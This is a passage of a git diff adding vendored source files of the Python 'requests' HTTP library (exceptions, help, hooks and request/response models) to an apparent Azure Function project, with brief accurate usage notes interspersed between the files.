:param cookies: Dictionary or CookieJar object to be added. + :rtype: CookieJar + """ + if not isinstance(cookiejar, cookielib.CookieJar): + raise ValueError("You can only merge into CookieJar") + + if isinstance(cookies, dict): + cookiejar = cookiejar_from_dict(cookies, cookiejar=cookiejar, overwrite=False) + elif isinstance(cookies, cookielib.CookieJar): + try: + cookiejar.update(cookies) + except AttributeError: + for cookie_in_jar in cookies: + cookiejar.set_cookie(cookie_in_jar) + + return cookiejar diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/exceptions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/exceptions.py new file mode 100644 index 0000000..429e76f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/exceptions.py @@ -0,0 +1,141 @@ +""" +requests.exceptions +~~~~~~~~~~~~~~~~~~~ + +This module contains the set of Requests' exceptions. 
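`cookiejar_from_dict` and `merge_cookies` compose as shown below; note that dict merges use `overwrite=False`, so cookies already in the jar win. A minimal sketch:

```python
from requests.cookies import cookiejar_from_dict, merge_cookies

jar = cookiejar_from_dict({"a": "1", "b": "2"})
merge_cookies(jar, {"b": "ignored", "c": "3"})

# 'b' keeps its original value because dict merges don't overwrite.
print(sorted((c.name, c.value) for c in jar))
# [('a', '1'), ('b', '2'), ('c', '3')]
```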
+""" +from urllib3.exceptions import HTTPError as BaseHTTPError + +from .compat import JSONDecodeError as CompatJSONDecodeError + + +class RequestException(IOError): + """There was an ambiguous exception that occurred while handling your + request. + """ + + def __init__(self, *args, **kwargs): + """Initialize RequestException with `request` and `response` objects.""" + response = kwargs.pop("response", None) + self.response = response + self.request = kwargs.pop("request", None) + if response is not None and not self.request and hasattr(response, "request"): + self.request = self.response.request + super().__init__(*args, **kwargs) + + +class InvalidJSONError(RequestException): + """A JSON error occurred.""" + + +class JSONDecodeError(InvalidJSONError, CompatJSONDecodeError): + """Couldn't decode the text into json""" + + def __init__(self, *args, **kwargs): + """ + Construct the JSONDecodeError instance first with all + args. Then use it's args to construct the IOError so that + the json specific args aren't used as IOError specific args + and the error message from JSONDecodeError is preserved. + """ + CompatJSONDecodeError.__init__(self, *args) + InvalidJSONError.__init__(self, *self.args, **kwargs) + + +class HTTPError(RequestException): + """An HTTP error occurred.""" + + +class ConnectionError(RequestException): + """A Connection error occurred.""" + + +class ProxyError(ConnectionError): + """A proxy error occurred.""" + + +class SSLError(ConnectionError): + """An SSL error occurred.""" + + +class Timeout(RequestException): + """The request timed out. + + Catching this error will catch both + :exc:`~requests.exceptions.ConnectTimeout` and + :exc:`~requests.exceptions.ReadTimeout` errors. + """ + + +class ConnectTimeout(ConnectionError, Timeout): + """The request timed out while trying to connect to the remote server. + + Requests that produced this error are safe to retry. + """ + + +class ReadTimeout(Timeout): + """The server did not send any data in the allotted amount of time.""" + + +class URLRequired(RequestException): + """A valid URL is required to make a request.""" + + +class TooManyRedirects(RequestException): + """Too many redirects.""" + + +class MissingSchema(RequestException, ValueError): + """The URL scheme (e.g. 
http or https) is missing.""" + + +class InvalidSchema(RequestException, ValueError): + """The URL scheme provided is either invalid or unsupported.""" + + +class InvalidURL(RequestException, ValueError): + """The URL provided was somehow invalid.""" + + +class InvalidHeader(RequestException, ValueError): + """The header value provided was somehow invalid.""" + + +class InvalidProxyURL(InvalidURL): + """The proxy URL provided is invalid.""" + + +class ChunkedEncodingError(RequestException): + """The server declared chunked encoding but sent an invalid chunk.""" + + +class ContentDecodingError(RequestException, BaseHTTPError): + """Failed to decode response content.""" + + +class StreamConsumedError(RequestException, TypeError): + """The content for this response was already consumed.""" + + +class RetryError(RequestException): + """Custom retries logic failed""" + + +class UnrewindableBodyError(RequestException): + """Requests encountered an error when trying to rewind a body.""" + + +# Warnings + + +class RequestsWarning(Warning): + """Base warning for Requests.""" + + +class FileModeWarning(RequestsWarning, DeprecationWarning): + """A file was opened in text mode, but Requests determined its binary length.""" + + +class RequestsDependencyWarning(RequestsWarning): + """An imported dependency doesn't match the expected version range.""" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/help.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/help.py new file mode 100644 index 0000000..c6aae71 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/help.py @@ -0,0 +1,134 @@ +"""Module containing bug report helper(s).""" + +import json +import platform +import ssl +import sys + +import idna +import urllib3 + +from . import __version__ as requests_version + +try: + import charset_normalizer +except ImportError: + charset_normalizer = None + +try: + import chardet +except ImportError: + chardet = None + +try: + from urllib3.contrib import pyopenssl +except ImportError: + pyopenssl = None + OpenSSL = None + cryptography = None +else: + import cryptography + import OpenSSL + + +def _implementation(): + """Return a dict with the Python implementation and version. + + Provide both the name and the version of the Python implementation + currently running. For example, on CPython 3.10.3 it will return + {'name': 'CPython', 'version': '3.10.3'}. + + This function works best on CPython and PyPy: in particular, it probably + doesn't work for Jython or IronPython. Future investigation should be done + to work out the correct shape of the code for those platforms. 
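Everything in this module ultimately derives from `RequestException` (itself an `IOError`), so callers can choose how fine-grained to be. A hedged sketch, using a reserved `.invalid` hostname that is guaranteed not to resolve:

```python
import requests
from requests.exceptions import ConnectionError, RequestException, Timeout

try:
    requests.get("https://example.invalid/", timeout=2)
except Timeout:
    print("timed out")          # also catches ConnectTimeout/ReadTimeout
except ConnectionError as exc:
    print("connection failed:", exc)
except RequestException as exc:
    print("other requests failure:", exc)
```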
+ """ + implementation = platform.python_implementation() + + if implementation == "CPython": + implementation_version = platform.python_version() + elif implementation == "PyPy": + implementation_version = "{}.{}.{}".format( + sys.pypy_version_info.major, + sys.pypy_version_info.minor, + sys.pypy_version_info.micro, + ) + if sys.pypy_version_info.releaselevel != "final": + implementation_version = "".join( + [implementation_version, sys.pypy_version_info.releaselevel] + ) + elif implementation == "Jython": + implementation_version = platform.python_version() # Complete Guess + elif implementation == "IronPython": + implementation_version = platform.python_version() # Complete Guess + else: + implementation_version = "Unknown" + + return {"name": implementation, "version": implementation_version} + + +def info(): + """Generate information for a bug report.""" + try: + platform_info = { + "system": platform.system(), + "release": platform.release(), + } + except OSError: + platform_info = { + "system": "Unknown", + "release": "Unknown", + } + + implementation_info = _implementation() + urllib3_info = {"version": urllib3.__version__} + charset_normalizer_info = {"version": None} + chardet_info = {"version": None} + if charset_normalizer: + charset_normalizer_info = {"version": charset_normalizer.__version__} + if chardet: + chardet_info = {"version": chardet.__version__} + + pyopenssl_info = { + "version": None, + "openssl_version": "", + } + if OpenSSL: + pyopenssl_info = { + "version": OpenSSL.__version__, + "openssl_version": f"{OpenSSL.SSL.OPENSSL_VERSION_NUMBER:x}", + } + cryptography_info = { + "version": getattr(cryptography, "__version__", ""), + } + idna_info = { + "version": getattr(idna, "__version__", ""), + } + + system_ssl = ssl.OPENSSL_VERSION_NUMBER + system_ssl_info = {"version": f"{system_ssl:x}" if system_ssl is not None else ""} + + return { + "platform": platform_info, + "implementation": implementation_info, + "system_ssl": system_ssl_info, + "using_pyopenssl": pyopenssl is not None, + "using_charset_normalizer": chardet is None, + "pyOpenSSL": pyopenssl_info, + "urllib3": urllib3_info, + "chardet": chardet_info, + "charset_normalizer": charset_normalizer_info, + "cryptography": cryptography_info, + "idna": idna_info, + "requests": { + "version": requests_version, + }, + } + + +def main(): + """Pretty-print the bug information as JSON.""" + print(json.dumps(info(), sort_keys=True, indent=2)) + + +if __name__ == "__main__": + main() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/hooks.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/hooks.py new file mode 100644 index 0000000..4b11bcc --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/hooks.py @@ -0,0 +1,33 @@ +""" +requests.hooks +~~~~~~~~~~~~~~ + +This module provides the capabilities for the Requests hooks system. + +Available hooks: + +``response``: + The response generated from a Request. 
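`info()` above is what powers bug reports; it can be called directly or through the module's `__main__` hook. A sketch (for this vendored copy, whether the module is importable from `sys.path` is an assumption):

```python
import json

from requests import help as requests_help

# Same JSON blob that `python -m requests.help` prints.
print(json.dumps(requests_help.info(), sort_keys=True, indent=2))
```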
+""" +HOOKS = ["response"] + + +def default_hooks(): + return {event: [] for event in HOOKS} + + +# TODO: response is the only one + + +def dispatch_hook(key, hooks, hook_data, **kwargs): + """Dispatches a hook dictionary on a given piece of data.""" + hooks = hooks or {} + hooks = hooks.get(key) + if hooks: + if hasattr(hooks, "__call__"): + hooks = [hooks] + for hook in hooks: + _hook_data = hook(hook_data, **kwargs) + if _hook_data is not None: + hook_data = _hook_data + return hook_data diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/models.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/models.py new file mode 100644 index 0000000..82b781c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/models.py @@ -0,0 +1,1034 @@ +""" +requests.models +~~~~~~~~~~~~~~~ + +This module contains the primary objects that power Requests. +""" + +import datetime + +# Import encoding now, to avoid implicit import later. +# Implicit import within threads may cause LookupError when standard library is in a ZIP, +# such as in Embedded Python. See https://github.com/psf/requests/issues/3578. +import encodings.idna # noqa: F401 +from io import UnsupportedOperation + +from urllib3.exceptions import ( + DecodeError, + LocationParseError, + ProtocolError, + ReadTimeoutError, + SSLError, +) +from urllib3.fields import RequestField +from urllib3.filepost import encode_multipart_formdata +from urllib3.util import parse_url + +from ._internal_utils import to_native_string, unicode_is_ascii +from .auth import HTTPBasicAuth +from .compat import ( + Callable, + JSONDecodeError, + Mapping, + basestring, + builtin_str, + chardet, + cookielib, +) +from .compat import json as complexjson +from .compat import urlencode, urlsplit, urlunparse +from .cookies import _copy_cookie_jar, cookiejar_from_dict, get_cookie_header +from .exceptions import ( + ChunkedEncodingError, + ConnectionError, + ContentDecodingError, + HTTPError, + InvalidJSONError, + InvalidURL, +) +from .exceptions import JSONDecodeError as RequestsJSONDecodeError +from .exceptions import MissingSchema +from .exceptions import SSLError as RequestsSSLError +from .exceptions import StreamConsumedError +from .hooks import default_hooks +from .status_codes import codes +from .structures import CaseInsensitiveDict +from .utils import ( + check_header_validity, + get_auth_from_url, + guess_filename, + guess_json_utf, + iter_slices, + parse_header_links, + requote_uri, + stream_decode_response_unicode, + super_len, + to_key_val_list, +) + +#: The set of HTTP status codes that indicate an automatically +#: processable redirect. +REDIRECT_STATI = ( + codes.moved, # 301 + codes.found, # 302 + codes.other, # 303 + codes.temporary_redirect, # 307 + codes.permanent_redirect, # 308 +) + +DEFAULT_REDIRECT_LIMIT = 30 +CONTENT_CHUNK_SIZE = 10 * 1024 +ITER_CHUNK_SIZE = 512 + + +class RequestEncodingMixin: + @property + def path_url(self): + """Build the path URL to use.""" + + url = [] + + p = urlsplit(self.url) + + path = p.path + if not path: + path = "/" + + url.append(path) + + query = p.query + if query: + url.append("?") + url.append(query) + + return "".join(url) + + @staticmethod + def _encode_params(data): + """Encode parameters in a piece of data. + + Will successfully encode parameters when passed as a dict or a list of + 2-tuples. 
Order is retained if data is a list of 2-tuples but arbitrary + if parameters are supplied as a dict. + """ + + if isinstance(data, (str, bytes)): + return data + elif hasattr(data, "read"): + return data + elif hasattr(data, "__iter__"): + result = [] + for k, vs in to_key_val_list(data): + if isinstance(vs, basestring) or not hasattr(vs, "__iter__"): + vs = [vs] + for v in vs: + if v is not None: + result.append( + ( + k.encode("utf-8") if isinstance(k, str) else k, + v.encode("utf-8") if isinstance(v, str) else v, + ) + ) + return urlencode(result, doseq=True) + else: + return data + + @staticmethod + def _encode_files(files, data): + """Build the body for a multipart/form-data request. + + Will successfully encode files when passed as a dict or a list of + tuples. Order is retained if data is a list of tuples but arbitrary + if parameters are supplied as a dict. + The tuples may be 2-tuples (filename, fileobj), 3-tuples (filename, fileobj, contentype) + or 4-tuples (filename, fileobj, contentype, custom_headers). + """ + if not files: + raise ValueError("Files must be provided.") + elif isinstance(data, basestring): + raise ValueError("Data must not be a string.") + + new_fields = [] + fields = to_key_val_list(data or {}) + files = to_key_val_list(files or {}) + + for field, val in fields: + if isinstance(val, basestring) or not hasattr(val, "__iter__"): + val = [val] + for v in val: + if v is not None: + # Don't call str() on bytestrings: in Py3 it all goes wrong. + if not isinstance(v, bytes): + v = str(v) + + new_fields.append( + ( + field.decode("utf-8") + if isinstance(field, bytes) + else field, + v.encode("utf-8") if isinstance(v, str) else v, + ) + ) + + for (k, v) in files: + # support for explicit filename + ft = None + fh = None + if isinstance(v, (tuple, list)): + if len(v) == 2: + fn, fp = v + elif len(v) == 3: + fn, fp, ft = v + else: + fn, fp, ft, fh = v + else: + fn = guess_filename(v) or k + fp = v + + if isinstance(fp, (str, bytes, bytearray)): + fdata = fp + elif hasattr(fp, "read"): + fdata = fp.read() + elif fp is None: + continue + else: + fdata = fp + + rf = RequestField(name=k, data=fdata, filename=fn, headers=fh) + rf.make_multipart(content_type=ft) + new_fields.append(rf) + + body, content_type = encode_multipart_formdata(new_fields) + + return body, content_type + + +class RequestHooksMixin: + def register_hook(self, event, hook): + """Properly register a hook.""" + + if event not in self.hooks: + raise ValueError(f'Unsupported event specified, with event name "{event}"') + + if isinstance(hook, Callable): + self.hooks[event].append(hook) + elif hasattr(hook, "__iter__"): + self.hooks[event].extend(h for h in hook if isinstance(h, Callable)) + + def deregister_hook(self, event, hook): + """Deregister a previously registered hook. + Returns True if the hook existed, False if not. + """ + + try: + self.hooks[event].remove(hook) + return True + except ValueError: + return False + + +class Request(RequestHooksMixin): + """A user-created :class:`Request ` object. + + Used to prepare a :class:`PreparedRequest `, which is sent to the server. + + :param method: HTTP method to use. + :param url: URL to send. + :param headers: dictionary of headers to send. + :param files: dictionary of {filename: fileobject} files to multipart upload. + :param data: the body to attach to the request. If a dictionary or + list of tuples ``[(key, value)]`` is provided, form-encoding will + take place. 
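The ordering guarantee described above is easy to see by calling the helper directly (it is internal, so this is for illustration rather than a supported API):

```python
from requests.models import RequestEncodingMixin

data = [("q", "azure"), ("q", "goat"), ("page", "1")]
# List-of-tuples input keeps order and repeated keys.
print(RequestEncodingMixin._encode_params(data))  # q=azure&q=goat&page=1
```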
+ :param json: json for the body to attach to the request (if files or data is not specified). + :param params: URL parameters to append to the URL. If a dictionary or + list of tuples ``[(key, value)]`` is provided, form-encoding will + take place. + :param auth: Auth handler or (user, pass) tuple. + :param cookies: dictionary or CookieJar of cookies to attach to this request. + :param hooks: dictionary of callback hooks, for internal usage. + + Usage:: + + >>> import requests + >>> req = requests.Request('GET', 'https://httpbin.org/get') + >>> req.prepare() + + """ + + def __init__( + self, + method=None, + url=None, + headers=None, + files=None, + data=None, + params=None, + auth=None, + cookies=None, + hooks=None, + json=None, + ): + + # Default empty dicts for dict params. + data = [] if data is None else data + files = [] if files is None else files + headers = {} if headers is None else headers + params = {} if params is None else params + hooks = {} if hooks is None else hooks + + self.hooks = default_hooks() + for (k, v) in list(hooks.items()): + self.register_hook(event=k, hook=v) + + self.method = method + self.url = url + self.headers = headers + self.files = files + self.data = data + self.json = json + self.params = params + self.auth = auth + self.cookies = cookies + + def __repr__(self): + return f"" + + def prepare(self): + """Constructs a :class:`PreparedRequest ` for transmission and returns it.""" + p = PreparedRequest() + p.prepare( + method=self.method, + url=self.url, + headers=self.headers, + files=self.files, + data=self.data, + json=self.json, + params=self.params, + auth=self.auth, + cookies=self.cookies, + hooks=self.hooks, + ) + return p + + +class PreparedRequest(RequestEncodingMixin, RequestHooksMixin): + """The fully mutable :class:`PreparedRequest ` object, + containing the exact bytes that will be sent to the server. + + Instances are generated from a :class:`Request ` object, and + should not be instantiated manually; doing so may produce undesirable + effects. + + Usage:: + + >>> import requests + >>> req = requests.Request('GET', 'https://httpbin.org/get') + >>> r = req.prepare() + >>> r + + + >>> s = requests.Session() + >>> s.send(r) + + """ + + def __init__(self): + #: HTTP verb to send to the server. + self.method = None + #: HTTP URL to send the request to. + self.url = None + #: dictionary of HTTP headers. + self.headers = None + # The `CookieJar` used to create the Cookie header will be stored here + # after prepare_cookies is called + self._cookies = None + #: request body to send to the server. + self.body = None + #: dictionary of callback hooks, for internal usage. + self.hooks = default_hooks() + #: integer denoting starting position of a readable file-like body. + self._body_position = None + + def prepare( + self, + method=None, + url=None, + headers=None, + files=None, + data=None, + params=None, + auth=None, + cookies=None, + hooks=None, + json=None, + ): + """Prepares the entire request with the given parameters.""" + + self.prepare_method(method) + self.prepare_url(url, params) + self.prepare_headers(headers) + self.prepare_cookies(cookies) + self.prepare_body(data, files, json) + self.prepare_auth(auth, url) + + # Note that prepare_auth must be last to enable authentication schemes + # such as OAuth to work on a fully prepared request. + + # This MUST go after prepare_auth. 
Authenticators could add a hook + self.prepare_hooks(hooks) + + def __repr__(self): + return f"" + + def copy(self): + p = PreparedRequest() + p.method = self.method + p.url = self.url + p.headers = self.headers.copy() if self.headers is not None else None + p._cookies = _copy_cookie_jar(self._cookies) + p.body = self.body + p.hooks = self.hooks + p._body_position = self._body_position + return p + + def prepare_method(self, method): + """Prepares the given HTTP method.""" + self.method = method + if self.method is not None: + self.method = to_native_string(self.method.upper()) + + @staticmethod + def _get_idna_encoded_host(host): + import idna + + try: + host = idna.encode(host, uts46=True).decode("utf-8") + except idna.IDNAError: + raise UnicodeError + return host + + def prepare_url(self, url, params): + """Prepares the given HTTP URL.""" + #: Accept objects that have string representations. + #: We're unable to blindly call unicode/str functions + #: as this will include the bytestring indicator (b'') + #: on python 3.x. + #: https://github.com/psf/requests/pull/2238 + if isinstance(url, bytes): + url = url.decode("utf8") + else: + url = str(url) + + # Remove leading whitespaces from url + url = url.lstrip() + + # Don't do any URL preparation for non-HTTP schemes like `mailto`, + # `data` etc to work around exceptions from `url_parse`, which + # handles RFC 3986 only. + if ":" in url and not url.lower().startswith("http"): + self.url = url + return + + # Support for unicode domain names and paths. + try: + scheme, auth, host, port, path, query, fragment = parse_url(url) + except LocationParseError as e: + raise InvalidURL(*e.args) + + if not scheme: + raise MissingSchema( + f"Invalid URL {url!r}: No scheme supplied. " + f"Perhaps you meant http://{url}?" + ) + + if not host: + raise InvalidURL(f"Invalid URL {url!r}: No host supplied") + + # In general, we want to try IDNA encoding the hostname if the string contains + # non-ASCII characters. This allows users to automatically get the correct IDNA + # behaviour. For strings containing only ASCII characters, we need to also verify + # it doesn't start with a wildcard (*), before allowing the unencoded hostname. + if not unicode_is_ascii(host): + try: + host = self._get_idna_encoded_host(host) + except UnicodeError: + raise InvalidURL("URL has an invalid label.") + elif host.startswith(("*", ".")): + raise InvalidURL("URL has an invalid label.") + + # Carefully reconstruct the network location + netloc = auth or "" + if netloc: + netloc += "@" + netloc += host + if port: + netloc += f":{port}" + + # Bare domains aren't valid URLs. + if not path: + path = "/" + + if isinstance(params, (str, bytes)): + params = to_native_string(params) + + enc_params = self._encode_params(params) + if enc_params: + if query: + query = f"{query}&{enc_params}" + else: + query = enc_params + + url = requote_uri(urlunparse([scheme, netloc, path, None, query, fragment])) + self.url = url + + def prepare_headers(self, headers): + """Prepares the given HTTP headers.""" + + self.headers = CaseInsensitiveDict() + if headers: + for header in headers.items(): + # Raise exception on invalid header value. + check_header_validity(header) + name, value = header + self.headers[to_native_string(name)] = value + + def prepare_body(self, data, files, json=None): + """Prepares the given HTTP body data.""" + + # Check if file, fo, generator, iterator. + # If not, run through normal process. + + # Nottin' on you. 
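End to end, `prepare()` runs the steps above in order (method, URL, headers, cookies, body, auth, hooks), and inspecting the result shows exactly what would go on the wire. A sketch against a hypothetical httpbin endpoint:

```python
import requests

req = requests.Request(
    "POST",
    "https://httpbin.org/post",
    params={"debug": "1"},
    json={"hello": "world"},
)
prepped = req.prepare()

print(prepped.method, prepped.url)      # POST https://httpbin.org/post?debug=1
print(prepped.headers["Content-Type"])  # application/json
print(prepped.body)                     # b'{"hello": "world"}'

# A Session transmits it unchanged:
# requests.Session().send(prepped)
```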
+ body = None + content_type = None + + if not data and json is not None: + # urllib3 requires a bytes-like body. Python 2's json.dumps + # provides this natively, but Python 3 gives a Unicode string. + content_type = "application/json" + + try: + body = complexjson.dumps(json, allow_nan=False) + except ValueError as ve: + raise InvalidJSONError(ve, request=self) + + if not isinstance(body, bytes): + body = body.encode("utf-8") + + is_stream = all( + [ + hasattr(data, "__iter__"), + not isinstance(data, (basestring, list, tuple, Mapping)), + ] + ) + + if is_stream: + try: + length = super_len(data) + except (TypeError, AttributeError, UnsupportedOperation): + length = None + + body = data + + if getattr(body, "tell", None) is not None: + # Record the current file position before reading. + # This will allow us to rewind a file in the event + # of a redirect. + try: + self._body_position = body.tell() + except OSError: + # This differentiates from None, allowing us to catch + # a failed `tell()` later when trying to rewind the body + self._body_position = object() + + if files: + raise NotImplementedError( + "Streamed bodies and files are mutually exclusive." + ) + + if length: + self.headers["Content-Length"] = builtin_str(length) + else: + self.headers["Transfer-Encoding"] = "chunked" + else: + # Multi-part file uploads. + if files: + (body, content_type) = self._encode_files(files, data) + else: + if data: + body = self._encode_params(data) + if isinstance(data, basestring) or hasattr(data, "read"): + content_type = None + else: + content_type = "application/x-www-form-urlencoded" + + self.prepare_content_length(body) + + # Add content-type if it wasn't explicitly provided. + if content_type and ("content-type" not in self.headers): + self.headers["Content-Type"] = content_type + + self.body = body + + def prepare_content_length(self, body): + """Prepare Content-Length header based on request method and body""" + if body is not None: + length = super_len(body) + if length: + # If length exists, set it. Otherwise, we fallback + # to Transfer-Encoding: chunked. + self.headers["Content-Length"] = builtin_str(length) + elif ( + self.method not in ("GET", "HEAD") + and self.headers.get("Content-Length") is None + ): + # Set Content-Length to 0 for methods that can have a body + # but don't provide one. (i.e. not GET or HEAD) + self.headers["Content-Length"] = "0" + + def prepare_auth(self, auth, url=""): + """Prepares the given HTTP auth data.""" + + # If no Auth is explicitly provided, extract it from the URL first. + if auth is None: + url_auth = get_auth_from_url(self.url) + auth = url_auth if any(url_auth) else None + + if auth: + if isinstance(auth, tuple) and len(auth) == 2: + # special-case basic HTTP auth + auth = HTTPBasicAuth(*auth) + + # Allow auth to make its changes. + r = auth(self) + + # Update self to reflect the auth changes. + self.__dict__.update(r.__dict__) + + # Recompute Content-Length + self.prepare_content_length(self.body) + + def prepare_cookies(self, cookies): + """Prepares the given HTTP cookie data. + + This function eventually generates a ``Cookie`` header from the + given cookies using cookielib. Due to cookielib's design, the header + will not be regenerated if it already exists, meaning this function + can only be called once for the life of the + :class:`PreparedRequest ` object. Any subsequent calls + to ``prepare_cookies`` will have no actual effect, unless the "Cookie" + header is removed beforehand. 
+ """ + if isinstance(cookies, cookielib.CookieJar): + self._cookies = cookies + else: + self._cookies = cookiejar_from_dict(cookies) + + cookie_header = get_cookie_header(self._cookies, self) + if cookie_header is not None: + self.headers["Cookie"] = cookie_header + + def prepare_hooks(self, hooks): + """Prepares the given hooks.""" + # hooks can be passed as None to the prepare method and to this + # method. To prevent iterating over None, simply use an empty list + # if hooks is False-y + hooks = hooks or [] + for event in hooks: + self.register_hook(event, hooks[event]) + + +class Response: + """The :class:`Response ` object, which contains a + server's response to an HTTP request. + """ + + __attrs__ = [ + "_content", + "status_code", + "headers", + "url", + "history", + "encoding", + "reason", + "cookies", + "elapsed", + "request", + ] + + def __init__(self): + self._content = False + self._content_consumed = False + self._next = None + + #: Integer Code of responded HTTP Status, e.g. 404 or 200. + self.status_code = None + + #: Case-insensitive Dictionary of Response Headers. + #: For example, ``headers['content-encoding']`` will return the + #: value of a ``'Content-Encoding'`` response header. + self.headers = CaseInsensitiveDict() + + #: File-like object representation of response (for advanced usage). + #: Use of ``raw`` requires that ``stream=True`` be set on the request. + #: This requirement does not apply for use internally to Requests. + self.raw = None + + #: Final URL location of Response. + self.url = None + + #: Encoding to decode with when accessing r.text. + self.encoding = None + + #: A list of :class:`Response ` objects from + #: the history of the Request. Any redirect responses will end + #: up here. The list is sorted from the oldest to the most recent request. + self.history = [] + + #: Textual reason of responded HTTP Status, e.g. "Not Found" or "OK". + self.reason = None + + #: A CookieJar of Cookies the server sent back. + self.cookies = cookiejar_from_dict({}) + + #: The amount of time elapsed between sending the request + #: and the arrival of the response (as a timedelta). + #: This property specifically measures the time taken between sending + #: the first byte of the request and finishing parsing the headers. It + #: is therefore unaffected by consuming the response content or the + #: value of the ``stream`` keyword argument. + self.elapsed = datetime.timedelta(0) + + #: The :class:`PreparedRequest ` object to which this + #: is a response. + self.request = None + + def __enter__(self): + return self + + def __exit__(self, *args): + self.close() + + def __getstate__(self): + # Consume everything; accessing the content attribute makes + # sure the content has been fully read. + if not self._content_consumed: + self.content + + return {attr: getattr(self, attr, None) for attr in self.__attrs__} + + def __setstate__(self, state): + for name, value in state.items(): + setattr(self, name, value) + + # pickled objects do not have .raw + setattr(self, "_content_consumed", True) + setattr(self, "raw", None) + + def __repr__(self): + return f"" + + def __bool__(self): + """Returns True if :attr:`status_code` is less than 400. + + This attribute checks if the status code of the response is between + 400 and 600 to see if there was a client error or a server error. If + the status code, is between 200 and 400, this will return True. This + is **not** a check to see if the response code is ``200 OK``. 
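Since `__bool__` only checks `status_code < 400`, truthiness is a weaker test than an explicit status comparison, as this sketch shows (httpbin's `/status/` endpoints are assumed reachable):

```python
import requests

r = requests.get("https://httpbin.org/status/204")
print(bool(r))        # True: 204 < 400, even though the body is empty

r = requests.get("https://httpbin.org/status/404")
print(bool(r))        # False
r.raise_for_status()  # raises requests.exceptions.HTTPError
```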
+ """ + return self.ok + + def __nonzero__(self): + """Returns True if :attr:`status_code` is less than 400. + + This attribute checks if the status code of the response is between + 400 and 600 to see if there was a client error or a server error. If + the status code, is between 200 and 400, this will return True. This + is **not** a check to see if the response code is ``200 OK``. + """ + return self.ok + + def __iter__(self): + """Allows you to use a response as an iterator.""" + return self.iter_content(128) + + @property + def ok(self): + """Returns True if :attr:`status_code` is less than 400, False if not. + + This attribute checks if the status code of the response is between + 400 and 600 to see if there was a client error or a server error. If + the status code is between 200 and 400, this will return True. This + is **not** a check to see if the response code is ``200 OK``. + """ + try: + self.raise_for_status() + except HTTPError: + return False + return True + + @property + def is_redirect(self): + """True if this Response is a well-formed HTTP redirect that could have + been processed automatically (by :meth:`Session.resolve_redirects`). + """ + return "location" in self.headers and self.status_code in REDIRECT_STATI + + @property + def is_permanent_redirect(self): + """True if this Response one of the permanent versions of redirect.""" + return "location" in self.headers and self.status_code in ( + codes.moved_permanently, + codes.permanent_redirect, + ) + + @property + def next(self): + """Returns a PreparedRequest for the next request in a redirect chain, if there is one.""" + return self._next + + @property + def apparent_encoding(self): + """The apparent encoding, provided by the charset_normalizer or chardet libraries.""" + return chardet.detect(self.content)["encoding"] + + def iter_content(self, chunk_size=1, decode_unicode=False): + """Iterates over the response data. When stream=True is set on the + request, this avoids reading the content at once into memory for + large responses. The chunk size is the number of bytes it should + read into memory. This is not necessarily the length of each item + returned as decoding can take place. + + chunk_size must be of type int or None. A value of None will + function differently depending on the value of `stream`. + stream=True will read data as it arrives in whatever size the + chunks are received. If stream=False, data is returned as + a single chunk. + + If decode_unicode is True, content will be decoded using the best + available encoding based on the response. + """ + + def generate(): + # Special case for urllib3. + if hasattr(self.raw, "stream"): + try: + yield from self.raw.stream(chunk_size, decode_content=True) + except ProtocolError as e: + raise ChunkedEncodingError(e) + except DecodeError as e: + raise ContentDecodingError(e) + except ReadTimeoutError as e: + raise ConnectionError(e) + except SSLError as e: + raise RequestsSSLError(e) + else: + # Standard file-like object. + while True: + chunk = self.raw.read(chunk_size) + if not chunk: + break + yield chunk + + self._content_consumed = True + + if self._content_consumed and isinstance(self._content, bool): + raise StreamConsumedError() + elif chunk_size is not None and not isinstance(chunk_size, int): + raise TypeError( + f"chunk_size must be an int, it is instead a {type(chunk_size)}." 
+ ) + # simulate reading small chunks of the content + reused_chunks = iter_slices(self._content, chunk_size) + + stream_chunks = generate() + + chunks = reused_chunks if self._content_consumed else stream_chunks + + if decode_unicode: + chunks = stream_decode_response_unicode(chunks, self) + + return chunks + + def iter_lines( + self, chunk_size=ITER_CHUNK_SIZE, decode_unicode=False, delimiter=None + ): + """Iterates over the response data, one line at a time. When + stream=True is set on the request, this avoids reading the + content at once into memory for large responses. + + .. note:: This method is not reentrant safe. + """ + + pending = None + + for chunk in self.iter_content( + chunk_size=chunk_size, decode_unicode=decode_unicode + ): + + if pending is not None: + chunk = pending + chunk + + if delimiter: + lines = chunk.split(delimiter) + else: + lines = chunk.splitlines() + + if lines and lines[-1] and chunk and lines[-1][-1] == chunk[-1]: + pending = lines.pop() + else: + pending = None + + yield from lines + + if pending is not None: + yield pending + + @property + def content(self): + """Content of the response, in bytes.""" + + if self._content is False: + # Read the contents. + if self._content_consumed: + raise RuntimeError("The content for this response was already consumed") + + if self.status_code == 0 or self.raw is None: + self._content = None + else: + self._content = b"".join(self.iter_content(CONTENT_CHUNK_SIZE)) or b"" + + self._content_consumed = True + # don't need to release the connection; that's been handled by urllib3 + # since we exhausted the data. + return self._content + + @property + def text(self): + """Content of the response, in unicode. + + If Response.encoding is None, encoding will be guessed using + ``charset_normalizer`` or ``chardet``. + + The encoding of the response content is determined based solely on HTTP + headers, following RFC 2616 to the letter. If you can take advantage of + non-HTTP knowledge to make a better guess at the encoding, you should + set ``r.encoding`` appropriately before accessing this property. + """ + + # Try charset from content-type + content = None + encoding = self.encoding + + if not self.content: + return "" + + # Fallback to auto-detected encoding. + if self.encoding is None: + encoding = self.apparent_encoding + + # Decode unicode from given encoding. + try: + content = str(self.content, encoding, errors="replace") + except (LookupError, TypeError): + # A LookupError is raised if the encoding was not found which could + # indicate a misspelling or similar mistake. + # + # A TypeError can be raised if encoding is None + # + # So we try blindly encoding. + content = str(self.content, errors="replace") + + return content + + def json(self, **kwargs): + r"""Returns the json-encoded content of a response, if 